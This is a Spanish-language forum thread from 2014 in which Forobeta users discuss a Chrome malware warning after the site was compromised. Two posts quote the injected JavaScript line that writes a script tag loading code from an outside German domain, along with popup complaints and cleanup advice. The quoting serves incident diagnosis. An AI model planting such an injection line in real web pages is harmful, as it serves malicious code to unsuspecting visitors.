¿Por que en el navegador google chrome dice esto de forobeta ? (software malicioso)

  • Autor Autor iniciopublic
  • Fecha de inicio Fecha de inicio
Estado

🔒 Este tema está cerrado para nuevas respuestas.

⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.

Es cierto, hasta ahora me doy cuenta hay mucho spam en inglés.
 
saludos [MENTION=1]Carlos Arreola[/MENTION] sabes que esta pasando ???
 
Igual mente a mi me sale lo mismo :ambivalence:

Captura.webp
 
Daniel Muñoz dijo:
Tranquila el ataque va centrado al sitio, no puedo ni se decirte que tan profundo sea.

Si es básico, solo es unas modificaciones de plantillas e introduccion de código malicioso para hacer referencia al website y tal vez mandarnso un archivo con virus mediante descargar directas.


Si es un poco mas complejo, (ahora van por aca) inundaran el foro con mensajes basura como lo están haciendo actualmente y posiblemente lancen un DDoS para tumbar el servidor.

Y si llegamos a los extremos, rompen la seguridad de vBulletin, modifican todo hacen un deface y por ultimo roban la base de datos obteniendo nuestros mails, contraseñas y toda nuestra información.

Mi recomendación: Si Tu contraseña o la de algunos es igual a la de su correo o de algún otro sitio, cámbienla =) asi evitaran problemas y no usen la misma contraseña para todo. De resto estén tranquilo. Y recuerden NO DESCARGAR NADA QUE VENGA DE FOROBETA.
Hacer clic para expandir...

Gracias por aclarar. 🙂

Afortunadamente tengo una pass especial para el foro, ya me aseguré de eso hace tiempo cuando comenzaron los problemas con cuentas. e.e

Esperemos que todo vaya bien con Forobeta. :encouragement:
 
Hola,

tambien confirmo me sale la alerta al entrar.
 
Ya llego Carlos y dio bann al spammer y borro los temas. Seguramente mas tarde abra un tema y explique que paso.
 
Si, tambien me sale al entrar a forobeta.
 
En ciertas páginas del foro me sale lo mismo.
 
wjharil dijo:
No sé.. pero quizá ayude... Este script es el infectado

Enlace eliminado

las últimas líneas muestra :

HTML: 
addLoadEvent(initPopupPM);

/*23f8b5*/
document.write("<script src='http://kanzlei-leon.de/NYjkWDyp.php?id=100799336' type='text/javascript'></" + "script>");
/*/23f8b5*/

Si alguien puede borrarlo... y evitar eso..
Hacer clic para expandir...

Entre y ya no sale, creo que lo solucionaron, solo queda esperar que google quite la alerta 🙂
 
a mi también me detecta algunas veces :ambivalence:
 
Me salio lo mismo, se habra infectado algo en mi PC?
 
Si fue alguien que inyecto ese código de alguna manera, creo que deberíamos considerar escanear nuestra PC con un buen Antivirus, seguido a eso cambiar las contraseñas de nuestras webs y Por ultimo no entrar al foro hasta que Carlos diga que paso y que esta solucionado por facebook o algun otro lado. Ya que si alguien logro Hackear Forobeta de algun modo, no creo que este buscando hacer Spam sino algo mas valioso. Las webs de sus usuarios.

Paranoico Mode: On

Quizas sea exagerado, pero mejor ser precavido no?
 
Igual a mí me sale la advertencia en Chrome.

Coincidentemente, desde hace unas horas, al entrar a fb como que se quedaba "cargando" la pagina, no sé si tenga algo que ver con el problema.
 
Ya debe estar solucionado, encontré los archivos modificados el problema es que no estoy seguro como se metieron... aunque tengo sospechas. Estaré al tanto y disculpen la tardanza pero es que andaba viendo una película.
 
Ami ya me bloqueo el acceso total a forobeta desde google chrome ahora estoypor medio de firefox ??
Aun no han eliminado el codigo malicioso

Enlace eliminado
Insertar CODE, HTML o PHP: 
addLoadEvent(initPopupPM);

/*23f8b5*/
document.write("<script src='http://kanzlei-leon.de/NYjkWDyp.php?id=100799336' type='text/javascript'></" + "script>");
/*/23f8b5*/
 
El mensaje me salía solo en Chrome ahora me apareció también en Firefox, ahora solo puedo entrar por explorer. :distant:

forobeta.webp
 
Carlos Arreola dijo:
Ya debe estar solucionado, encontré los archivos modificados el problema es que no estoy seguro como se metieron... aunque tengo sospechas. Estaré al tanto y disculpen la tardanza pero es que andaba viendo una película.
Hacer clic para expandir...

No dijiste los riezgos de nustras computadoras si les paso algo si hay que tomar medidas o que.
 
Carlos Arreola dijo:
Ya debe estar solucionado, encontré los archivos modificados el problema es que no estoy seguro como se metieron... aunque tengo sospechas. Estaré al tanto y disculpen la tardanza pero es que andaba viendo una película.
Hacer clic para expandir...

Aun persiste el problema. Intentaste haciendo una búsqueda completa archivo por archivo buscando
kanzlei-leon.de
Hacer clic para expandir...
.

El acceso fue por admincp o fue modificada directamente desde el FTP?
Revisa el log de conexión del admincp busca variables en las IP, si no hay nada extraño busca en el FTP.

Postdata, aun hay codigo malicioso, mientras redactaba este post me saltaron 3 popup bloqueandome la pagina.

---------- Post agregado el 16-ene-2014 hora: 00:13 ----------

Al postear brincaron unos 7 popup mas, resultado.
TqhL5n1.png


Cierra el sitio, estas perdiendo el control. Ya no puedo entrar
 
Última edición:
Estado

🔒 Este tema está cerrado para nuevas respuestas.

⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.

Temas similares

Xauen
Google Chrome dice adiós a una de sus funciones más odiadas
Respuestas
9
Visitas
331
Ader
Ader
iniciopublic
navegador google chrome no guarda historial ¿que debo hacer?
Respuestas
4
Visitas
392
ticky667
T
iniciopublic
¿ es mi imaginacion o el navegador google chrome cambio su interfaz el dia de hoy?
Respuestas
11
Visitas
850
carlos2928
C
R
  • Cerrado
A alguien mas le sale esto
Respuestas
12
Visitas
702
Carlos Arreola
Carlos Arreola
hernanmdq
Adjal está siendo bloqueado por software malicioso
Respuestas
5
Visitas
957
hernanmdq
hernanmdq
Atrás
Arriba